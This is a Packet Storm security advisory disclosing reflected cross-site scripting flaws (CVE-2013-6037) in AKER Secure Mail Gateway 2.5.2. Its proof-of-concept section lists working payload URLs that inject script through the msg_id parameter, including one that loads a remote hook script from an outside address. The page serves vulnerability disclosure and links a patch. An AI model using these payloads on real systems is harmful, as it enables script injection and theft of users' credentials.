exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting
Posted Mar 7, 2014
Authored by William Costa

AKER Secure Mail Gateway versions 2.5.2 and below suffer from multiple reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-6037
SHA-256 | ab5924cb2e8e920bf0c586e1b34dba02ede340dc74de1607cbabdf1fa1986191

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

Change Mirror Download
XSS in url for access of Confirmation Required in box for antispam from
company AKER (CVE-2013-6037)

I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY <= v2.5.2

II. BACKGROUND
-------------------------
The Aker Secure Mail Gateway is a complete platform security e-mail

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Aker Secure Mail Gateway
<=2.5.2 , that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.
The code injection is done through the parameter "msg_id" and "content" in
the page index.php.


IV. PROOF OF CONCEPT
-------------------------
The application does not validate the double encoding of the "msg_id"
parameter correctly. Malicious Request ("msg_id")
https://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6)
); </script>
Vulnerable:
https://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script
src=https://10.0.1.142:5005/xook.js></script>
Vulnerable:
https://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe
src=https://www.google.com> </iframe>


V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Aker Secure Mail Gateway <= v2.5.2

VII. SOLUTION
-------------------------
https://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp

References

https://www.kb.cert.org/vuls/id/687278
https://www.aker.com.br/
https://www.aker.com.br/produtos/aker-secure-mail-gateway
https://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All

By Wiliam Costa
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close